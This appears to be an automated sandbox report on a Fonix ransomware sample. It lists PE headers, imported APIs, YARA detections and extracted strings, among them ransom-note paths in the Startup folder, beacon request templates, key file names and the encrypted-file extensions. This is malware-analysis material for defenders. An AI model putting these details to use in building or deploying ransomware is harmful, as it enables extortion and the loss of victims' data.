                              inc ecx
                              push esi
                              dec eax
                              sub esp, 20h
                              dec ecx
                              mov ebx, dword ptr [ecx+38h]
                              dec eax
                              mov esi, edx
                              dec ebp
                              mov esi, eax
                              dec eax
                              mov ebp, ecx
                              dec ecx
                              mov edx, ecx
                              dec eax
                              mov ecx, esi
                              dec ecx
                              mov edi, ecx
                              dec esp
                              lea eax, dword ptr [ebx+04h]
                              call 00007F5608B109B1h

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x11f8080xa0.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1380000x1e0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x12d0000x9dd4.pdata
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0xffdd00x28.rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xffca00x130.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000xcbaa40xcbc00False0.472607122316data6.42152157563IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rdata0xcd0000x53ac00x53c00False0.402766441231data5.43978969466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x1210000xbd4c0x8a00False0.188632246377data4.8717114038IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .pdata0x12d0000x9dd40x9e00False0.48457278481data5.99554424225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              _RDATA0x1370000x940x200False0.20703125data1.43109942357IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .rsrc0x1380000x1e00x200False0.529296875data4.71229819329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x1390000x2ba00x2c00False0.00301846590909data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountry
                              RT_MANIFEST0x1380600x17dXML 1.0 document textEnglishUnited States

                              Imports

                              DLLImport
                              KERNEL32.DLLSetThreadPriority, CreateMutexW, InitializeCriticalSectionEx, FindClose, LocalAlloc, ReleaseMutex, GetLocaleInfoA, OpenProcess, SetFileAttributesW, CreateToolhelp32Snapshot, Sleep, FormatMessageW, CopyFileA, GetLastError, Process32NextW, DeleteFileA, Process32FirstW, CloseHandle, RaiseException, DecodePointer, GetDriveTypeA, LocalFree, DeleteCriticalSection, CopyFileW, WideCharToMultiByte, GetConsoleWindow, GetDiskFreeSpaceExA, OpenMutexW, GetDriveTypeW, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetCurrentThread, GetThreadTimes, SetEndOfFile, WriteConsoleW, CreateFileW, SetStdHandle, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, TerminateProcess, GetCurrentProcess, FindNextFileW, SetPriorityClass, FindFirstFileW, SetThreadPriorityBoost, SetProcessPriorityBoost, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindFirstFileExW, HeapSize, HeapReAlloc, ReadConsoleW, ReadFile, GetFileAttributesExW, CreateProcessW, GetExitCodeProcess, GetConsoleMode, GetConsoleCP, FlushFileBuffers, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, GetCurrentThreadId, WaitForSingleObjectEx, SwitchToThread, EncodePointer, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, SetEvent, ResetEvent, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetStartupInfoW, GetCurrentProcessId, CreateTimerQueue, SignalObjectAndWait, CreateThread, GetThreadPriority, GetLogicalProcessorInformation, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, FreeLibrary, FreeLibraryAndExitThread, GetModuleFileNameW, GetModuleHandleA, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, ReleaseSemaphore, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, LoadLibraryW, WaitForSingleObject, RtlUnwindEx, RtlPcToFileHeader, ExitProcess, GetModuleHandleExW, ExitThread, MoveFileExW, GetStdHandle, WriteFile, GetCommandLineA, GetCommandLineW, GetFileSizeEx, SetFilePointerEx, GetFileType, HeapAlloc, HeapFree, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, RtlUnwind
                              ADVAPI32.dllCryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameA
                              IPHLPAPI.DLLGetIpNetTable
                              NETAPI32.dllNetShareEnum, NetApiBufferFree
                              USER32.dllGetKeyboardLayoutList, ExitWindowsEx, ShowWindow, MessageBoxW, SystemParametersInfoW
                              WININET.dllInternetCheckConnectionA
                              WS2_32.dllinet_ntoa, connect, WSAGetLastError, socket, send, WSAStartup, gethostbyname, closesocket, WSACleanup, recv, htons

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              No network behavior found

                              Code Manipulations

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              System Behavior

                              General

                              Start time:18:00:05
                              Start date:11/01/2021
                              Path:C:\Users\user\Desktop\fM498uO16Z.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Users\user\Desktop\fM498uO16Z.exe'
                              Imagebase:0x1180000
                              File size:1266688 bytes
                              MD5 hash:E7F086119362368528A160BE01F194AD
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Fonix, Description: Yara detected Fonix ransomware, Source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Fonix, Description: Yara detected Fonix ransomware, Source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, Author: Joe Security
                              Reputation:low

                              Disassembly

                              Code Analysis

                              Reset < >

                                Executed Functions

                                Non-executed Functions

                                APIs
                                • CopyFileW.KERNEL32 ref: 01195E4C
                                • CopyFileW.KERNEL32 ref: 01195E72
                                • CopyFileW.KERNEL32 ref: 01195E91
                                • CopyFileW.KERNEL32 ref: 01195EB0
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011960B8
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011960BE
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011960C4
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011960CA
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011960D0
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011960D6
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01196583
                                  • Part of subcall function 011AA370: Concurrency::cancel_current_task.LIBCPMT ref: 011AA4D9
                                  • Part of subcall function 011AA370: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AA4E5
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01196589
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0119658F
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0119713F
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01197145
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0119714B
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01197151
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01197157
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0119715D
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01197163
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01197169
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0119716F
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01197175
                                • #115.WS2_32(?,?,00000000,?,00000000,00000000,?), ref: 011971DC
                                  • Part of subcall function 011AE6B0: Concurrency::cancel_current_task.LIBCPMT ref: 011AE851
                                  • Part of subcall function 011AE6B0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AE85D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn$CopyFile$Concurrency::cancel_current_task$#115
                                • String ID: Connection: close$%$0i@$0O$:80User-Agent: curl/7.66.0Accept: */*Content-type: text/html; charset=utf-8Connection: close$:80User-Agent: curl/7.66.0Accept: */*Content-type: text/html; charset=utf-8Content-Length: $April$August$C:\ProgramData$C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Help.txt$C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\How To Decrypt Files.hta$C:\ProgramData\OS$Connected.$Connecting...$Copy SystemID C:\ProgramData\SystemID$Could not connect$December$February$GET /json/ HTTP/1.1Host: $Gen ID $January$July$June$March$May$November$October$POST /fhttpb/get.php HTTP/1.1Host: $September$SystemID$WSAStartup failed.$\Help.txt$\How To Decrypt Files.hta$body : $copy readme $date $day=$month=$osname $pzB$res : $size of body : $wmic os get Caption /value >>C:\ProgramData\OS$wwww$year=${"query":"no ip information"}$~
                                • API String ID: 2857748787-1293505723
                                • Opcode ID: 59cd2907b57dca50c23a039d3a08ed7353bc751795833e26437bdc38b2abbcb6
                                • Instruction ID: 80f3f9a22fbe1a00cc9da4fb18d2b5348ee5e69e84632582ac7e83f49a1a744f
                                • Opcode Fuzzy Hash: 59cd2907b57dca50c23a039d3a08ed7353bc751795833e26437bdc38b2abbcb6
                                • Instruction Fuzzy Hash: 9E23EE72710B8586EB18DF29E89039D3BA1FB957ACF904216DB6D07BA8DF78C195C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • EncodePointer.KERNEL32(?,?,?,?,011F0181,?,?,00000000,011EFF75,?,?,?,011AC02B), ref: 011F10FE
                                • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F1139
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F114C
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F1163
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F117A
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F1191
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F11A8
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F11BF
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F11D6
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F11ED
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F1204
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F121B
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F1232
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F1249
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F1260
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F1277
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F128E
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F12A5
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F12BC
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F12D3
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F12EA
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F1301
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F1318
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F132F
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,011F0181,?,?,00000000,011EFF75), ref: 011F1346
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: AddressProc$EncodeHandleModulePointer
                                • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                • API String ID: 73157160-295688737
                                • Opcode ID: 14be373a3951d2a25b77c43ade7dd7d6e23b8d4fbdace8696765a190bfccd485
                                • Instruction ID: 1ea97f520ed43702ca78841c7d629449422c50287c0b2457554d37e762e120ae
                                • Opcode Fuzzy Hash: 14be373a3951d2a25b77c43ade7dd7d6e23b8d4fbdace8696765a190bfccd485
                                • Instruction Fuzzy Hash: 8AB19574601F0A92EF04EB95BC983D833A6FB59BA5F845625C84A07325EFBC85B9C341
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBVCRUNTIME ref: 01215540
                                • DName::operator+.LIBVCRUNTIME ref: 01215627
                                • DName::operator+.LIBVCRUNTIME ref: 01215672
                                • DName::operator+.LIBVCRUNTIME ref: 01215693
                                • DName::operator+.LIBVCRUNTIME ref: 01215703
                                • DName::operator+.LIBVCRUNTIME ref: 01215715
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+
                                • String ID: /$[thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                • API String ID: 2943138195-2884338863
                                • Opcode ID: afb466b5a7f974317aa57039da6e6d9bb612a9bf29cb3641fa58c3f690892c4d
                                • Instruction ID: 848fc531d63923bed7213468d1e11caeb9230a714bc50555ef7111e858a768ec
                                • Opcode Fuzzy Hash: afb466b5a7f974317aa57039da6e6d9bb612a9bf29cb3641fa58c3f690892c4d
                                • Instruction Fuzzy Hash: 58829472638B8286DB01DF68E4903AEBBF1F7E5354F501116EB8A47A5CEBB8C544CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F4C2
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F4C8
                                  • Part of subcall function 011AE6B0: Concurrency::cancel_current_task.LIBCPMT ref: 011AEA23
                                  • Part of subcall function 011AE6B0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AEA29
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F4D4
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F4DA
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F4E0
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F4E6
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F4EC
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F4F2
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F4F8
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F4FE
                                • Concurrency::cancel_current_task.LIBCPMT ref: 0118F504
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F50A
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F510
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F516
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F51C
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F522
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118F528
                                  • Part of subcall function 011AE6B0: Concurrency::cancel_current_task.LIBCPMT ref: 011AE851
                                  • Part of subcall function 011AE6B0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AE85D
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F0D
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F13
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F1F
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F25
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F2B
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F31
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F37
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F3D
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F43
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F49
                                • Concurrency::cancel_current_task.LIBCPMT ref: 01190F4F
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F55
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F5B
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F61
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F67
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F6D
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01190F73
                                  • Part of subcall function 011D8AC0: CryptGenRandom.ADVAPI32 ref: 011D8B4C
                                  • Part of subcall function 011D8AC0: CryptReleaseContext.ADVAPI32 ref: 011D8B67
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$Crypt$ContextRandomRelease
                                • String ID: Input error $ Output error $ rename error $.Email=[$0@@$0i@$0O$::::$PsB$].FONIX$].XINOF$]ID=[$pzB
                                • API String ID: 3383250404-496889190
                                • Opcode ID: fc682d8b884d947b9b32e063e56987a2d03871241b1d2809f7fbaf1036132967
                                • Instruction ID: 05a73451dd7c6e1258634337b29e16bd95d3d33c93804fd1d942865e6b6d605a
                                • Opcode Fuzzy Hash: fc682d8b884d947b9b32e063e56987a2d03871241b1d2809f7fbaf1036132967
                                • Instruction Fuzzy Hash: 9C436B72610BC58ADB28DF29D8943DD37A5F799798F808226DB5D4BBA8DF74C294C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01192774
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0119277A
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01192786
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0119278C
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01192792
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01192798
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0119279E
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011927A4
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011927AA
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011927B0
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011927B6
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011927BC
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011927C2
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011927C8
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011927CE
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011927D4
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011927DA
                                  • Part of subcall function 011AE6B0: Concurrency::cancel_current_task.LIBCPMT ref: 011AE851
                                  • Part of subcall function 011AE6B0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AE85D
                                • CopyFileW.KERNEL32 ref: 0119291A
                                • CopyFileW.KERNEL32 ref: 01192A04
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01192B77
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01192B83
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01192B8F
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01192B95
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01192B9B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskCopyFile
                                • String ID: Input error $ Output error $ rename error $.Email=[$0@@$0i@$0O$0O$::::$C:\ProgramData$Cpriv.key$Cpub.key$\Cpriv.key$\Cpub.key$].FONIX$]ID=[$copy to path $pzB$zip file
                                • API String ID: 2758439042-2347499708
                                • Opcode ID: 9347d3fff3a689152f9381bb409f1d1bb2c9cbb81d65a8e3f477357efcde0bed
                                • Instruction ID: 096d1ed9928832d7a9048d2f5517d7821b8faab7c3ca6ce44255d21811b560ee
                                • Opcode Fuzzy Hash: 9347d3fff3a689152f9381bb409f1d1bb2c9cbb81d65a8e3f477357efcde0bed
                                • Instruction Fuzzy Hash: 0DF29932610BC199DB28DF29D8943DD37A5F795BA8F804216DB6D4BBA8EF74C295C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E070
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E076
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E082
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E088
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E08E
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E094
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E09A
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E0A0
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E0A6
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E0AC
                                • Concurrency::cancel_current_task.LIBCPMT ref: 0118E0B2
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E0B8
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E0BE
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E0C4
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E0CA
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E0D0
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0118E0D6
                                  • Part of subcall function 011AE6B0: Concurrency::cancel_current_task.LIBCPMT ref: 011AE851
                                  • Part of subcall function 011AE6B0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AE85D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                • String ID: Input error $ Output error $ rename error $.Email=[$0@@$0i@$0O$::::$PsB$].XINOF$]ID=[$pzB
                                • API String ID: 3936042273-4024620267
                                • Opcode ID: d780693f1955c37ddc8ad434ce574d70ad7bb3782d829128e7d5f2cd8dcd0c3c
                                • Instruction ID: b0cde5a64c349be38b8c1804374c0dcfb8c0600b46ba38acacc71d2ec0195259
                                • Opcode Fuzzy Hash: d780693f1955c37ddc8ad434ce574d70ad7bb3782d829128e7d5f2cd8dcd0c3c
                                • Instruction Fuzzy Hash: 7CC28B32211BC189EB28DF69D8943DD37A5F795798F808226DB5D4BBA8EF74C294C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 011D8AC0: CryptGenRandom.ADVAPI32 ref: 011D8B4C
                                  • Part of subcall function 011D8AC0: CryptReleaseContext.ADVAPI32 ref: 011D8B67
                                  • Part of subcall function 011B5390: __std_exception_copy.LIBVCRUNTIME ref: 011B548D
